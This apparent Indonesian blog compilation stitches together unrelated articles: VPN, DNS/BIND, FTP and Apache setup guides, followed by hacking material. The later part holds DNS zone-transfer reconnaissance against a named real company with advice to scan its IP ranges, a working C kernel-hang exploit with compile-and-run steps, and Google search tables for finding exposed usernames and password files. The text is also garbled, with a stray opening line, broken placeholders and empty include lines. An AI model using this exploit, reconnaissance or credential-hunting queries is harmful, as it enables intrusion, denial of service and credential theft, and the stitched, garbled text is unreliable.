I cant to understand about you honey

Kita mungkin sering mendengar orang membicarakan VPN sebagai salah satu solusi
alternatif untuk membangun secure connection. Sebenarnya, apa sih VPN itu? Menurut
IETF (Internet Engineering Task Force), VPN is An emulation of [a] private Wide Area
Network (WAN) using shared or public IP facilities, such as the Internet or private IP
bacbones. VPN merupakan suatu bentuk private intranet yang melalui public network,
yaitu Internet, dengan menekankan pada keamanan dan konektifitas yang efektif antara 2
node yang berhubungan. Hubungan ini dilakukan dengan pembuatan
“terowongan”(tunnel), yang menghubungkan antara 2 node untuk saling bertukar data.
Hal ini mirip dengan hubungan pada point-to-point connection.

{alt}

Ada beberapa protokol yang digunakan pada untuk mengimplementasikan VPN yaitu,
IPSec (IP Security), PPTP(Point to Point Tunnelling Protocol), L2F(Link Layer
Forwarding), dan L2TP (Link Layer Tunnelling Protocol). Dalam hal ini, protokol yang
digunakan adalah PPTP karena PPTP telah diintegrasikan secara default pada Sistem

Instalasi dan Konfigurasi PoPToP
Prasyarat untuk PPTP adalah pseudo-device tun. Untuk FreeBSD versi 4.0 keatas tidak
perlu meng-compile kernel, tp untuk FreeBSD versi yang lebih lama, option pseudodevice
tun harus di-enable-kan terlebih dahulu di kernel.
Instalasi, seperti layaknya software-software di UNIX atau LINUX, dapat dilakukan
dengan beberapa cara. Dalam hal ini, instalasi dilakukan dengan ports. Yeah, I love ports!

Code:

dialup#cd /usr/ports/net/poptop
dialup#make config

Domain Name Server atau yang disingkat dengan DNS adalah sebuah sistem yang menyimpan
informasi tentang nama host maupun nama domain dalam bentuk data tersebar
(distributed database) di dalam jaringan komputer. Dengan DNS, suatu alamat IP dapat
dialamatkan ke dalam nama host dan nama domain yang lebih mudah diingat manusia.

Coba bayangkan, jika Anda harus
membuka suatu situs (google misalnya)
dengan menghapalkan alamat
IP-nya adalah 66.249.89.99 untuk membuka
situs itu. Tentu akan lebih mudah bagi
kita untuk menghapal dengan nama www.
google.com daripada 66.249.89.99.
Dahulu sebelum diperkenalkannya DNS
sebagai suatu system untuk pengalamatan
alamat IP ke dalam suatu nama domain, setiap
komputer di jaringan komputer menggunakan
fi le HOST.TXT untuk memetakan
alamat IP ke nama domain. Namun setelah
pengguna Internet semakin banyak, penggunaan
fi le HOST.TXT ini tidak lagi efektif,
karena setiap pengguna harus selalu mengupdate
fi le HOST.TXT setiap ada penambahan
atau perubahan nama domain baru di
dalam jaringan.
Berangkat dari problem itu, maka dibutuhkan
sebuah sistem yang bisa mengganti
alamat host hanya di satu tempat, host lain
akan mempelajari perubahan tersebut secara
dinamis. Dan sistem inilah yang kemudian
dikenal dengan nama DNS.
DNS ditemukan oleh Paul Mockapetris
pada tahun 1983. Spesifi kasi asli muncul di
RFC 882 dan 883. Tahun 1987, penerbitan
RFC 1034 dan RFC 1035 membuat update
terhadap spesifi kasi DNS. Hal ini membuat
RFC 882 dan RFC 883 tidak berlaku lagi. Beberapa
RFC terkini telah memproporsikan
beberapa tambahan dari protokol inti DNS.
Pada Artikel ini, penulis akan menjelaskan
prinsip kerja dari DNS. Untuk mempermudah,
penulis akan menjelaskan cara
setting DNS Server untuk jaringan lokal.

Instalasi BIND
Sebelum dapat memulai konfi gurasi DNS,
Anda harus menginstalasikan paket BIND
terlebih dahulu. Biasanya paket BIND sudah
dipaketkan pada setiap distro Linux.
Pada saat penulisan artikel ini, penulis mencobanya
pada distro Fedora Core 4. Untuk
pengguna distro lainnya, Anda tinggal menyesuaikan
langkah instalasi BIND sesuai
dengan distro yang Anda gunakan.
Untuk menginstalasikan paket BIND di
Fedora Core 4, Anda dapat menginstalasikannya
dengan menggunakan Add/Remove Applications,
lalu klik Detail pada bagian DNS
Name Server. Cek semua paket yang ada pada
group tersebut, Close, lalu klik Update. Cara
lainnya Anda dapat menginstalasikan paketpaket
rpm BIND yang ada pada CD Fedora
Core dengan menggunakan pe rintah RPM.
Jika Anda ingin menginstalasikan dari
Source Code, download terlebih dahulu paket
BIND dari situs http://www.isc.org. Versi
BIND terakhir yang bisa di-download dari
situs tersebut adalah BIND 9.3.1

Code:

$ wget -c ftp://ftp.isc.org/isc/
bind9/9.3.1/bind-9.3.1.tar.gz

Ekstrak fi le source tersebut, dan lakukan
kompilasi

Code:

# tar -xzvf bind-9.3.1.tar.gz
# cd bind-9.3.1
# ./configure –prefix=/usr/
local/named
# make
# make install
# adduser -d /var/named -s /bin/
false named

Untuk kebanyakan pengguna Linux, paket
BIND yang ada di dalam distro sudah
cukup untuk memenuhi kebutuhan. Jadi
kalau tidak terlalu dibutuhkan untuk instalasi
lewat source, disarankan untuk menggunakan
paket BIND yang sudah ada di
distro saja.
Setting BIND
File-fi le yang harus diperhatikan untuk
mengkonfi gurasikan BIND, antara lain:
1. /etc/resolv.conf: (berisi alamat domain
atau alamat IP dari name server).
2. /etc/named.conf (berisi keterangan letak
dan jenis database yang dibutuhkan oleh
BIND).
3. /var/named/named.ca: (berisi informasi
data yang berada dalam domain root,
yang akan dipergunakan name server
jika ada resolver yang akan meminta
nama domain diluar nama domain lokal).
4. /var/named/named.local: (berisi alamat
loopback untuk alamat ke diri sendiri
dengan alamat 127.0.0.1).

Persiapan setting domain baru
Dalam studi kasus kali ini, kita akan membuat
domain baru untuk DNS Server dan
mail server, ftp server, http server, dengan
data sebagai berikut:
Nama Domain : example.com
Nama DNS Server : ns.example.com
IP DNS Server : 192.168.2.1
Nama Mail Server : mail.example.com
Nama HTTP Server : www.example.com
Nama FTP Server : ftp.example.com

Struktur Layanan Internet
Salah satu ciri yang menonjol dari Internet adalah bahwa banyak dari layanan-layanan yang berjalan diatasnya diimplementasikan menggunakan arsitektur client/server. Pengertian dari client dan server itu sendiri adalah sebagai berikut :
Client merupakan pihak yang bertanggung jawab untuk berinteraksi dengan user; sebagai contoh, dengan menerima masukan dari keyboard dan menampilkan data ke user. Sedangkan Server, merupakan pihak yang bertanggung jawab untuk menangani tugas-tugas yang diminta client; sebagai contoh, mengakses data atas nama client, menangani perhitungan, menyediakan data atau tanggapan sederhana pada client, dan sebagainya.
Pengenalan Layanan Informasi di Internet
Layanan informasi di Internet yang akan dikenalkan disini mencakup antara lain layanan e-mail, telnet, finger, FTP, WAIS, dan World Wide Web (WWW).
E-mail atau electronic mail, sesuai dengan namanya adalah layanan Internet yang berupa pengiriman mail (surat) yang datanya diubah ke bentuk data elektronik dan dikirimkan melalui jaringan komputer. E-mail melalui internet dapat mencapai tidak hanya orang-orang yang terhubung langsung ke Internet tapi juga user dari jaringan komersil seperti CompuServe, America Online , dsb, serta jaringan komputer lain yang telah tersebar di seluruh dunia (Wide Area Network).
Telnet dan Finger adalah dua layanan yang datang bersama kebanyakan sistem operasi, sehingga keduanya digunakan secara luas meskipun service tersebut sederhana. Telnet mengizinkan seseorang untuk login ke dalam sebuah sistem melalui jaringan seakan-akan orang tersebut login dari terminal pada sistem tersebut. Finger didesain untuk menyediakan informasi mengenai user dari lokal maupun remote sistem (seperti nama lengkap yang berhubungan dengan alamat e-mail user)
FTP (File Transfer Protocol) merupakan layanan yang paling banyak digunakan oleh pemakai Internet untuk mengambil atau meletakkan file dari atau ke mesin lain di Internet. FTP sama seperti login ke suatu mesin, tapi disini user dibatasi pada sejumlah command tertentu, dan untuk anonymous FTP user, dibatasi hanya pada direktori tertentu. Arsip yang di-set agar dapat diakses oleh publik disebut arsip anonymous FTP, karena sebarang orang dapat login (hanya alamat e-mail orang tersebut diminta sebagai identifikasi). FTP client terdapat pada hampir semua jenis komputer, dari palmtop sampai supercomputer. Setelah e-mail, FTP adalah layanan Internet yang paling umum digunakan.
Jika anda mempunyai sebuah database yang sangat besar dan anda sedang mencari cara untuk memberikan kemudahan pada user untuk melihat isi seluruh database maka WAIS adalah jawabannya. WAIS atau Wide Area Information Server, menyediakan layanan akses ke suatu database melalui jaringan TCP/IP . Software WAIS yang terbaru memungkinkan pembuatan indeks yang mudah untuk database yang sangat besar. Server mengizinkan user untuk meminta pencarian di database untuk keyword yang sederhana atau ekspresi boolean yang lebih kompleks.
World Wide Web atau lebih sering dikenal sebagai Web adalah layanan Internet yang paling banyak memiliki tampilan grafis dan kemampuan link yang sangat bagus. Keistimewaan inilah yang telah menjadikan Web sebagai service yang paling cepat pertumbuhannya. Web mengizinkan pemberian highlight (penyorotan/penggaris bawahan) pada kata-kata atau gambar dalam sebuah dokumen untuk menghubungkan atau menunjuk ke media lain seperti dokumen, frase, movie clip, atau file suara. Web dapat menghubungkan dari sebarang tempat dalam sebuah dokumen atau gambar ke sebarang tempat di dokumen lain. Dengan sebuah browser yang memiliki Graphical User Interface (GUI), link-link dapat dihubungkan ke tujuannya dengan menunjuk link tersebut dengan mouse dan menekannya.
Dibawah ini akan dibahas proses instalasi server dari dua layanan Internet yang umum digunakan yaitu server untuk layanan FTP dan WWW pada UNIX FreeBSD.

Instalasi FTP Server
Ada dua tipe akses yang FTP server sediakan yaitu user FTP dan anonymous FTP. User FTP adalah adalah layanan FTP yang disediakan untuk orang yang mempunyai sebuah user account pada suatu host, sedangkan anonymous FTP disediakan untuk publik. Dengan layanan FTP anda dapat melakukan transfer file dari sistem anda atau ke sistem anda dari berbagai tempat di internet. Tapi anda tidak dapat mengeksekusi semua perintah yang ada karena FTP server memang hanya menyediakan perintah-perintah tertentu, seperti melihat daftar dan mengubah direktori, dan menerima serta mengirim file. Pada instalasi ini yang akan menjadi pokok bahasan kita adalah Anonymous FTP server yang merupakan inti dari sebuah FTP Server.
FTP server terdiri dari dua bagian, yaitu : server, yang menanggapi permintaan client seperti mengirim file, mendaftar direktori yang ada, dan lain-lain ; dan filesystem yang merupakan tempat FTP server membaca file dan direktori yang ada. Program implementasi standar UNIX untuk menjalankan FTP server adalah ftpd (ftp daemon). ftpd berjalan dibawah inetd, UNIX superserver. inetd mendengarkan permintaan pada sejumlah port, termasuk port kontrol FTP, TCP port 21. Ketika sebuah FTP client pertama kali mencoba untuk berhubungan dengan sebuah FTP server, dia mengirimkan paket ke port 21 pada host tujuannya. Kemudian inetd menerima paket tersebut, menentukan dari nomor port tujuan bahwa layanan FTP perlu dijalankan, dengan melakukan proses forking dan executing pada ftpd. Jika pada saat yang bersamaan ada client lain yang ingin berhubungan dengan FTP server, maka inetd akan meminta kopi dari ftpd yang sudah berjalan untuk menanganinya. Baris pada file konfigurasi inetd, inetd.conf yang mengawasi bagaiman ftpd dijalankan dapat dilihat di bawah ini :
ftp stream tcp nowait root /etc/ftpd ftpd -l
Biasanya pada sistem UNIX konfigurasi untuk ftpd seperti contoh diatas sudah ada pada file inetd.conf, yang akan kita bahas sekarang adalah arti dari masing-masing field pada baris konfigurasi diatas.
Field pertama (ftp) adalah field protokol, yang memberitahu inetd layanan apa yang disinggung oleh baris ini. Kemudian inetd akan melihat di file /etc/services untuk mencari padanan dari nomor port ftp yang ternyata adalah port 21. Ketika inetd menerima paket untuk port 21, maka inetd dengan menggunakan baris inetd.conf diatas sudah mengetahui server apa yang harus ia jalankan (FTP server).
Field kedua dan ketiga (stream dan tcp) menerangkan tipe komunikasi yang digunakan FTP server. Dalam hal ini, komunikasi dilakukan melalui hubungan TCP, yang merupakan aliran data berurutan antar dua komputer. Perlu diingat bahwa File Transfer Protocol (FTP) hanya bekerja melalui hubungan TCP.
Field keempat (nowait) memberitahukan inetd untuk menjalankan sebuah server baru setiap kali ada client yang akan berhubungan. Apabila menuliskan wait pada field ini, maka akan memberitahu inetd bahwa untuk menjalankan sebuah server baru haru menunggu sampai tidak ada lagi server yang sedang berjalan.
Dua field terakhir (/etc/ftpd dan ftpd -l) memberitahu pathname lengkap dari ftpd dan argumennya (termasuk nama programnya, ftpd) untuk digunakan ketika menjalankan server.
Setelah melakukan konfigurasi FTP server untuk berjalan dibawah inetd, anda perlu untuk menambahkan sebuah ftp user pada file /etc/passwd di komputer anda. ftpd akan memeriksa keberadaan dari ftp user sebelum mengizinkan seorang anonymous user untuk menggunakan layanan FTP. Entry ftp user di file /etc/passwd harus mempunyai user ID dan group ID yang unik dan user harus tidak diizinkan untuk masuk melalui layanan standar yang lain seperti telnet dan rlogin. Password user ftp pada /etc/passwd harus berisi *, yang berarti bahwa tidak ada password, dan login shell seharusnya di-set ke /bin/false, sehingga sistem tidak mengizinkan user ftp untuk login dari layanan lain. Setelah itu, direktori yang boleh diakses oleh ftp user juga harus diset yaitu di /usr/ftp. Contoh baris pada file /etc/passwd dapat dilihat dibawah ini.
ftp:*:500:25:Anonymous FTP user:/user/ftp:/bin/false
Untuk melakukan instalasi sebuah FTP server di FreeBSD, dapat dilakukan pada saat instalasi sistem FreeBSD pertama kali atau setelah sistem sudah berjalan. Cara pertama, instalasi FTP server bersamaan dengan instalasi FreeBSD pertama kali, hampir sama dengan cara kedua, hanya saja cara pertama mulai dari pengkonfigurasian hardware, sedangkan cara kedua langsung ke menu-menu instalasi. Karena itu yang akan dibahas disini adalah cara yang kedua.
Pertama kali anda harus login sebagai root, kemudian ketikkan perintah sysinstall yang ada pada direktori /stand, atau langsung dengan mengetikkan :
# /stand/sysinstall
maka akan tampil menu Install, kemudian pilihlah menu Configure, maka akan muncul menu berikut :

Gambar 1. Menu Configure

Gambar 2. Menu Networking

Pilihlah menu Networking untuk melakukan konfigurasi layanan network tambahan, dan akan ditampilkan menu seperti gambar 2. Kemudian pilihlah menu Anon FTP untuk melakukan instalasi Anonymous FTP server.

Gambar 3. Konfigurasi Anonymous FTP server

Gantilah konfigurasi diatas jika ada yang akan anda ubah, seperti FTP root directory misalnya dapat diubah ke /data/ftp atau /usr/local/ftp. Untuk bagian lain sebenarnya merupakan konfigurasi default dan tidak perlu diubah, dengan memilih OK maka proses instalasi telah selesai.

Instalasi Web Server
Web browser dan web server berkomunikasi menggunakan protokol HTTP (HyperText Transfer Protocol) . Ketika sebuah web browser meminta sebuah dokumen HTML dari web server, hubungan dibuka, kemudian dokumen ditransfer, dan setelah itu hubungan ditutup. Layanan yang menggunakan protokol http ini memiliki nomor port 80 (default), sehingga web server akan selalu mendengarkan permintaan client pada port 80. Ada beberapa contoh web server antara lain yaitu NCSA, CERN dan Plexus, tapi yang akan kita bahas disini adalah instalasi software APACHE untuk web server yang sudah ada di FreeBSD. Sama seperti instalasi FTP server, instalasi WWW serverpun dapat dilakukan bersamaan dengan instalasi FreeBSD pertama kali atau setelah FreeBSD berjalan. Sekarang kita akan melakukan instalasi setelah FreeBSD berjalan tapi dengan cara lain yaitu dengan menggunakan perintah pkg_add.
Pertama kali ambillah source software Apache, bisa dari CDROM, ftp site yang menyediakan source FreeBSD beserta packages-nya seperti misalnya di ftp.jp.FreeBSD.org/pub/FreeBSD/packages-2.2.8/www dengan nama file apache-1.2.6.tgz, atau langsung mengambil dari www.apache.org. Setelah diambil source-nya, extract-lah dengan perintah pkg_add.
# pkg_add apache-1.2.6.tgz
Biasanya hasil extract file tersebut langsung diletakkan di /usr/local/www dan file httpd di /usr/local/sbin. Setelah itu edit-lah file-file konfigurasi dari web server, yaitu httpd.conf, srm.conf dan access.conf yang biasanya terletak di /usr/local/www/server/conf agar webserver yang kita install sesuai dengan yang kita harapkan.
Konfigurasi httpd.conf
Kita hanya akan membahas bagian-bagian yang penting dari file konfigurasi ini :
 Ubah User dan Group dengan nama yang sesuai dengan keinginan anda, tapi disarankan untuk menggunakan user www dan group www, setelah itu edit-lah file /etc/master/passwd dan /etc/group untuk menambahkan user dan group baru tersebut.
 Ubah Server Admin menjadi nama yang anda inginkan, misalnya nama_anda@domain_anda. Nama ini harus diisi karena server akan memberitahukan Admin tersebut jika terjadi masalah dengan server.
 Ubah Server Root ke path direktori tempat anda meletakkan file executable httpd, file inilah yang akan dijalankan bila ada permintaan dari client, secara default Server Root akan terletak di /usr/local/www/httpd.
 Ubah Server Name menjadi www.domain.anda. Nama ini harus sesuai dengan record yang ada pada name server dari domain anda.
 Ubah Server Type sesuai dengan keinginan anda, ada dua pilihan yaitu inetd dan standalone. Secara default akan berisi standalone dan sebaiknya tidak perlu diubah.
Konfigurasi srm.conf
 Ubah Document Root ke path direktori tempat anda meletakkan file HTML anda.
 Isi opsi UserDir dengan enable bila anda ingin user pada komputer anda dapat memiliki homepage sendiri, atau disable jika ingin sebaliknya.
Konfigurasi access.conf
Default dari access.conf adalah :

 Ubahlah path diatas ke direktori cgi-bin anda :
Options Indexes Follow Symlinks

 Ubahlah path diatas ke direktori dari data homepage anda
Options IndexesFollowSymlinks
AllowOverride All

Setelah semuanya di-edit maka anda telah siap untuk menjalankan web server anda secara standalone (server membaca konfigurasi sekali pada waktu dieksekusi dan akan dijalankan terus-menerus sampai prosesnya dimatikan) dengan cara me-reboot sistem anda. Jika letak file merupakan default-nya (biasanya di /usr/local/www/server/conf) maka cukup dengan menjalankan daemon-nya saja :
# /usr/local/sbin/httpd

Interogasi DNS – melihat mesin di domain sasaran

Sesudah melakukan network enumeration menggunakan perintah “whois” langkah selanjutnya yang akan banyak membantu mengidentifikasi semua domain yang berada di bawah organisasi sasaran adalah dengan mengambil infomrasi Domain Name System (DNS). DNS pada dasarnya sebuah basisdata yang terdistribusi yang melakukan pemetaan antara alamat IP dengan nama domain & sebaliknya.

Jika DNS tidak dikonfigurasi dengan baik (aman), maka akan sangat mungkin untuk melihat informasi tentang organisasi di dalamnya. Salah satu kesalahan paling fatal yang sering dilakukan oleh sistem administrator adalah mengijinkan pengguna internet yang tidak bisa dipercaya untuk melakukan zone transfer.

Zone transfer adalah fasilitas di DNS untuk mentransfer seluruh informasi tentang domain yang akan menjadi sasaran tembak. Jika anda berhasil memperoleh informasi seluruh domain tersebut, beberapa informasi yang akan membantu anda adalah entry:

HINFO – yang memberikan informasi tentang mesin yang digunakan.
MX – mesin perantara yang menerima e-mail untuk domain tersebut.

Selain beberapa informasi lainnya tentang pemetaan alamat IP dengan hostname.

Salah satu cara yang mungkin agak mudah untuk melakukan zone transfer, pada masa lalu, bisa dilakukan dengan mudah menggunakan perangkat lunak nslookup dengan perintah ls. Hanya saja, nslookup yang ada pada saat ini biasanya sudah tidak lagi dilengkapi dengan perintah ls, karena sering di salahgunakan untuk melakukan zone transfer yang diperlukan pada saat melalukan footprinting sebelum serangan di lakukan.

Alternatif lain yang dapat digunakan adalah menggunakan software dig & host. Sebagai contoh, dibawah ini adalah hasil interogasi DNS dari domain telkom.co.id mengunakan perintah host –l –v –t any.

Code:

[root@yusuf-mesinku]# host -l -v -t any telkom.co.id
Trying “telkom.co.id.”
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 40309
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 3, ADDITIONAL: 5

;; QUESTION SECTION:
;telkom.co.id. IN ANY

;; ANSWER SECTION:
telkom.co.id. 65237 IN MX 5 in-mta1.telkom.co.id.
telkom.co.id. 65237 IN MX 10 in-mta2.telkom.co.id.
telkom.co.id. 61859 IN A 202.134.2.15
telkom.co.id. 79371 IN NS ns3.telkom.co.id.
telkom.co.id. 79371 IN NS ns1.telkom.co.id.
telkom.co.id. 79371 IN NS ns2.telkom.co.id.

;; AUTHORITY SECTION:
telkom.co.id. 79371 IN NS ns3.telkom.co.id.
telkom.co.id. 79371 IN NS ns1.telkom.co.id.
telkom.co.id. 79371 IN NS ns2.telkom.co.id.

;; ADDITIONAL SECTION:
in-mta1.telkom.co.id. 65237 IN A 202.134.0.196
in-mta2.telkom.co.id. 65237 IN A 202.134.0.197
ns1.telkom.co.id. 79371 IN A 202.134.0.155
ns2.telkom.co.id. 79371 IN A 202.134.2.5
ns3.telkom.co.id. 79371 IN A 202.134.1.10

Received 270 bytes from 202.159.33.2#53 in 883 ms

Atau kalau anda ingin men-safe hasil interogasi-nya ke dalam file agar memudahkan untuk mengevaluasi dikemudian hari, dapat di redirect menggunakan perintah >

Code:

[root@yusuf-mesinku]# host -l -v -t any telkom.co.id > zone_telkom.co.id

Kebetulan tidak banyak informasi yang dapat diperoleh dari hasil query tentang telkom.co.id. Ada beberapa entry MX, NS & A yang diperoleh dari query DNS telkom.co.id. Beberapa inti informasi tersebut adalah:

• MX berisi informasi tentang Mail Exchange, tempat e-mail dikirim ke domain tersebut.
• NS berisi informasi tentang mesin yang berfungsi membawa semua informasi DNS domain telkom.co.id.
• A adalah alamat IP dari mesin yang dimaksud.

Dengan minimalnya informasi, paling tidak yang kita ketahui bahwa:

• ada dua (2) mesin utama yang berfungsi sebagai MX untuk domain telkom.co.id yaitu in-mta1.telkom.co.id & in-mta2.telkom.co.id.
• Tampaknya mesin-mesin utama telkom.co.id berada di alamat IP keluarga 20.134.0.x.
• Tampaknya keluarga 202.134.1.x & 202.134.2.x juga perlu di evaluasi karena ada beberapa mesin penting di sana.
• Tidak ada informasi HINFO, jadi kita tidak bisa melihat secara langsung mesin / sistem operasi apa yang digunakan oleh Telkom.

Mungkin akan menarik jika kita scan / petakan semua mesin yang berada di alamat IP 202.134.0.x s/d 202.134.2.x karena akan memperlihatkan semua mesin penting yang akan mendukung kerja telkom.co.id termasuk anak-anak perusahaannya; kemungkinan besar termasuk telkom.net.id, plasa.com dll.

Jika kita ingin melihat alamat IP yang spesifik dapat juga dilakukan menggunakan program host / dig, sebagai contoh disini diperlihatkan pada saat melakukan query tentang www.telkom.co.id melalui perintah dig.

Code:

[root@yusuf-mesinku]# dig www.telkom.co.id

; < <>> DiG 9.1.1 < <>> www.telkom.co.id
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36787
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 3

;; QUESTION SECTION:
;www.telkom.co.id. IN A

;; ANSWER SECTION:
www.telkom.co.id. 39899 IN A 202.134.2.15

;; AUTHORITY SECTION:
telkom.co.id. 79239 IN NS ns2.telkom.co.id.
telkom.co.id. 79239 IN NS ns3.telkom.co.id.
telkom.co.id. 79239 IN NS ns1.telkom.co.id.

;; ADDITIONAL SECTION:
ns1.telkom.co.id. 79239 IN A 202.134.0.155
ns2.telkom.co.id. 79239 IN A 202.134.2.5
ns3.telkom.co.id. 79239 IN A 202.134.1.10

;; Query time: 303 msec
;; SERVER: 202.159.33.2#53(202.159.33.2)
;; WHEN: Fri Aug 10 08:07:42 2001
;; MSG SIZE rcvd: 152

Dari informasi ini diperoleh informasi bahwa www.telkom.co.id berada dalam daerah alamat IP 202.134.2.x, jadi betul prediksi di atas bahwa mesin-mesin di daerah 202.134.0.x s/d 202.134.2.x akan membawa beberapa mesin penting untuk operasional telkom.co.id & berbagai anak perusahaan di bawahnya.

referensi from artikenya onno w purbo

Meng-compile Eksploit Dalam Bahasa C

Pada saat penggembaraan kita dalam melakukan hacking sering kali kita memperoleh program (eksploit) yang dapat digunakan untuk mengeksploitasi sebuah sistem. Program ini tidak jarang berbentuk source code bukan executable dalam bahasa C yang perlu kita compile agar menjadi bentuk executable yang dapat dijalankan.

Di samping itu, cara belajar hacking yang terbaik adalah dengan mempelajari program orang lain yang telah sukses dalam melakukan hacking. Atau melihat struktur program yang ada. Di Linux, proses belajar ini menjadi sangat cepat karena sebagian besar source code Linux tersedia / terbuka & dapat kita lihat menggunakan teks editor biasa pada directory:

/usr/src/linux

Tentunya sebelum melihat demikian banyak source code ada baiknya anda membaca-baca berbagai teknik yang berkaitan dengan kerja sistem operasi / Linux maupun kerja Internet yang di dokumentasikan dalam bentuk file Request For Comment (RFC) yang dapat di ambil secara gratis di berbagai situs Internet, seperti http://www.internic.net, http://www.linuxdoc.org dsb.

Contoh sebuah source code eksploit untuk Linux kernel 2.2-2.3.99 saya tampilkan berikut ini.

/* [http://b0f.morphed.net] - eth0 */
/* */
/* Vulnerable
Linux 2.2.12
Linux 2.2.13
Linux 2.2.14
Linux 2.3.99-pre2

The following exploit code will hang any Linux machine on various
Pentium platforms.

Note that this does not require any special privileges, and any user
Can compile and run it, so watch out kiddies…

The send system call immediately puts the kernel in a loop spewing
kmalloc: Size (131076) too large forever
(or until you hit the reset button).

Apparently UNIX domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter,
despite the documentation to the contrary.

[code provided by eth0 from b0f security]
[information provided by Jay Fenlason]
[http://b0f.morphed.net]
[buffer0verfl0w security]
*/

#include
#include
#include

char buf[128 * 1024];

int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;

for ( i = 0; i < bufsize; i++ )
buf = ' '+(i%95);
buf = '\0';

SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data)
);
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr)
);
return 0;
}

Eksploit ini merupakan teknik yang membuat buffer (stack) over flow sehingga mesin Linux anda tidak bisa beroperasi lagi seperti hang, kecuali anda reset. Kebetulan saya menggunakan Mandrake 8.0 yang menggunakan kernel 2.4.3 yang tidak terpengaruh terhadap eksploit ini.

Setelah ada mengedit file source code dalam bahasa C dengan teks editor biasa. Langkah selanjutnya adalah mengcompile-nya. Pada masa lalu (jaman DOS 3.3), saya biasanya menggunakan Turbo C untuk mengcompile source code. Saat ini dengan menggunakan Linux, jika di install fasilitas development-nya, maka GNU C Compiler (gcc) biasanya merupakan bagian integral dari fasilitas development pada Linux.

Pada Linux, proses compiling dapat dilakukan secara sederhana saja, dengan menuliskan perintah:

$ gcc eksploit.c –o eksploit

maka file eksploit.c akan di compile menjadi executable yang dalam hal ini di beri nama eksploit (oleh perintah –o eksploit) yang kemudian dapat dijalankan dengan perintah:

$ ./eksploit

Jika anda mulai melakukan pemrogramman yang kompleks dengan banyak source file C, maka biasanya dibantu dengan file Makefile yang akan mengatur cara-cara membuat objek code & compile dari masing-masing source code.

referensi dari salah satu artikelnya onno w purbo

___ ___ __ __ ____ ____
/ \ __ ____/ \ ___/ / / |__ _/ | | |
/ /\_| / / | - |/ \ | | | |/ | /__ _ / __/
/ /__ |__/ /| | / _ | |/ / / | / \ / | /_
\__ \ _ \ __/ /\/ | | || | |_ | / / _/
__| / / | | \ \ | / | / | / / | /| |
\____/|_| /_/\___/_||_/ /__/ /

google sebagai web pencarian no 1 saat ini memang belum ada duanya. teknik pencarian dengan penggunaan macam tipe dan operator membuat user dapat membuat berbagai macam variasi pencarian. kita tidak akan membahas berbagai macam operator tersebut, karena judul artikel ini mendapatkan password dan username.

semua tabel dalam artikel ini diambil dari buku
“google hacking for penetration testers”, mungkin ada temen2 yang belum sempet baca jadi saya tulis aja biar semua bisa menikmati. biar temen2 yang masih newbie tidak terheran heran jika seseorang bisa mendapatkan banyak passworddari website. jadi gak usah heran….

TABEL KATA KATA KUNCI MENDAPATKAN USERNAMES
———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:admin inurl: |userlist Generic userlist files
———————————————————
inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
———————————————————
inurl:php inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
———————————————————
filetype:ctl |
inurl:haccess. |Microsoft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
———————————————————
filetype:reg |
reg intext: |Microsoft Internet Account Manager can
———————————————————
”internet account manager” |reveal usernames and more
filetype:wab wab |Microsoft Outlook Express Mail address
|books
———————————————————
filetype:mdb inurl:profiles |Microsoft Access databases containing
|profiles.
———————————————————
index.of perform.ini |mIRC IRC ini file can list IRC usernames and
|other information
———————————————————
inurl:root.asp?acs=anon |Outlook Mail Web Access directory can be
|used to discover usernames
———————————————————
filetype:conf inurl:proftpd. |PROFTP FTP server configuration file
conf –sample |reveals
|username and server information
———————————————————
filetype:log username putty |PUTTY SSH client logs can reveal
|usernames
|and server information
———————————————————
filetype:rdp rdp |Remote Desktop Connection files reveal user
|credentials
———————————————————
intitle:index.of |UNIX bash shell history reveals commands
.bash_history |typed at a bash command prompt; usernames
|are often typed as argument strings
———————————————————
intitle:index.of |UNIX shell history reveals commands typed at
.sh_history |a shell command prompt; usernames are
|often typed as argument strings
———————————————————
“index of ” lck |Various lock files list the user currently using
|a file
———————————————————
+intext:webalizer +intext: |Webalizer Web statistics page lists Web user-
Total Usernames +intext: |names and statistical information
”Usage Statistics for”
———————————————————
filetype:reg reg HKEY_ |Windows Registry exports can reveal
CURRENT_USER |username usernames and other information
———————————————————

TABEL KATA-KATA KUNCI MENDAPATKAN PASSWORD

———————————————————
KATA KUNCI | KETERANGAN
———————————————————
inurl:/db/main.mdb |ASP-Nuke passwords
———————————————————
filetype:cfm “cfapplication |ColdFusion source with potential passwords
name” password
———————————————————
filetype:pass |dbman credentials
pass intext:userid
———————————————————
allinurl:auth_user_file.txt |DCForum user passwords
———————————————————
eggdrop filetype:user user |Eggdrop IRC user credentials
———————————————————
filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
———————————————————
filetype:url +inurl:”ftp://” |FTP bookmarks cleartext passwords
+inurl:”@”
———————————————————
inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
———————————————————
filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
———————————————————
intitle:”Index of” “.htpasswd” |HTTP htpasswd Web user credentials
htpasswd.bak
———————————————————
“http://*:*@www” bob:bob |HTTP passwords (bob is a sample username)
———————————————————
“sets mode: +k” |IRC channel keys (passwords)
———————————————————
“Your password is * |Remember IRC NickServ registration passwords
this for later use”
———————————————————
signin filetype:url |JavaScript authentication credentials
———————————————————
LeapFTP intitle:”index.of./” |LeapFTP client login credentials
sites.ini modified
———————————————————
inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
